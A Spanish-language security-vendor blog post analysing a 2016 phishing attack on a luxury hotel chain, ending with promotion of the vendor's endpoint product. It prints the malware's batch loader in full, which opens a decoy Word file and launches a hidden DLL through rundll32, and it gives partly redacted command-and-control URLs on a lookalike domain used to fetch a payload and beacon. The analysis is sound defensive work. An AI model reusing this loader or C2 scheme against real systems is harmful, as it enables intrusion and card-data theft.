Recientemente publicamos un documento donde relatamos los numerosos ataques que las principales cadenas hoteleras están sufriendo, principalmente dirigidos al robo de tarjetas de crédito infectando los terminales de punto de venta de dichos establecimientos. Hace unos días uno de nuestros clientes de Adaptive Defense 360, una cadena de hoteles de lujo, sufrió un ataque dirigido y quería aprovechar la oportunidad para mostrar cómo los ciberdelincuentes tratan de entrar en la red de la empresa.
Sabemos que en la mayoría de los casos este tipo de ataques suelen iniciarse a través de un email, que bien contiene algún fichero adjunto con el que comprometer el equipo de la víctima o bien algún enlace a una página que hará uso de una vulnerabilidad para lograr dicho objetivo. En este caso se trataba de un mensaje de correo dirigido a un empleado del hotel. Simulaba ser la información de pago de una estancia que tendría lugar a finales de mayo de 2016.
El mensaje contenía un fichero adjunto comprimido, al abrirlo contenía un fichero con icono de Microsoft Word que mostraba lo siguiente al ser ejecutado:
Se trata de un documento del hotel rellenado por un cliente donde facilita los datos de pago para una estancia que tendrá lugar a finales de mayo de 2016. Aparentemente nada raro, de hecho el documento es idéntico a los que la empleada del hotel manda a sus clientes, viene incluso su nombre en el mismo. Pero si nos fijamos, veremos que el fichero que viene dentro del zip, a pesar de que tiene el icono de Word, se trata de un ejecutable.
Cuando lo ejecutamos, crea 3 ficheros en disco y ejecuta el primero de ellos:
– reader_sl.cmd
– ROCA.ING.docx
– adobeUpd.dll (MD5: A213E36D3869E626D4654BCE67F6760C)
El contenido del primer fichero es el siguiente:
@echo off
start “” ROCA.ING.docx
Set xOS=x64
If “%PROCESSOR_ARCHITECTURE%”==”x86” If Not Defined PROCESSOR_ARCHITEW6432 Set xOS=x86
IF “%xOS%” == “x64” (start “” C:\Windows\SysWOW64\rundll32.exe adobeUpd.dll,Wenk)
IF “%xOS%” == “x86” (start “” C:\Windows\System32\rundll32.exe adobeUpd.dll,Wenk)
ping -n 12 localhost
Como podemos ver, al ejecutarse lo primero que hace es abrir el documento de Word para consumar el engaño a nuestra víctima. A continuación ejecuta el fichero adobeUpd.dll, dándole como parámetro “Wenk”. Al ejecutarse modifica sus atributos marcando el fichero como de sólo lectura y oculto, y crea una entrada en el registro de Windows para ejecutarse cada vez que se enciende el ordenador.
Contacta con una URL específica:
http://www.************.ga/en/scripts/en.php?stream=lcc&user=iPmbzfAIRMFw
Descargándose un fichero que contiene el user del parámetro dado a la URL (iPmbzfAIRMFw). En caso de coincidir, trata de descargarse el fichero
http://www.************.ga/en/scripts/iPmbzfAIRMFw.jpg
Cuando tratamos de descargarlo no estaba disponible, tampoco estaba en nuestro cliente ya que bloqueamos el intento de infección y no se llegó a ejecutar el malware. El dominio de la URL se trata de exactamente el mismo dominio de nuestro cliente, salvo que ellos utilizan “.com” y los atacantes habían registrado un dominio con el mismo nombre pero en Gabón (“.ga”). Esto lo han hecho para pasar desapercibidos, ya que si el equipo de seguridad del hotel ve una conexión que contiene el nombre de su dominio no llamará la atención.
A pesar de que el fichero iPmbzfAIRMFw.jpg no estaba disponible, analizando el código de adobeUpd.dll vemos que busca una marca específica en dicho fichero, descifra los datos y lo ejecuta como un PE (que crea como “TEMP\systm”).
Posteriormente el adobeUpd.dll se queda en un bucle conectando aleatoriamente cada varios minutos a:
http://www.************.ga/en/scripts/en.php?mode=OPR&uid=iPmbzfAIRMFw&type=YFm
Como vemos se trata de un ataque dirigido a esta cadena hotelera. Los delincuentes han borrado todas las huellas del servidor donde se conectaba el malware, y como abortamos su ataque sólo podemos especular qué es lo que iban a hacer a continuación. En nuestra experiencia, este tipo de ataques busca comprometer un equipo de la empresa de la víctima para a continuación moverse lateralmente hasta llegar a su objetivo final: los terminales de punto de venta que procesan los pagos de tarjetas de crédito, tal y como hemos visto en tantos otros casos.
Los antivirus tradicionales no sirven contra este tipo de ataques, ya que son amenazas creadas específicamente para la víctima y antes de lanzarlo se aseguran siempre de que el malware no es detectado por firmas, tecnologías proactivas, etc. que llevan integradas las soluciones antimalware actuales. Es por ello que contar con servicios tipo EDR (Endpoint Detection & Response) que cuenten con tecnologías de protección avanzada, algo vital para tener una protección efectiva ante estos ataques.
Panda Security es una empresa especializada en la creación de productos de seguridad para endpoints que son parte del portfolio de soluciones de seguridad IT de WatchGuard. Centrada inicialmente en la creación de software antivirus, la compañía ha ampliado sus objetivos expandiendo su línea de negocio hacia los servicios de ciberseguridad avanzada con tecnologías para la prevención del cibercrimen.
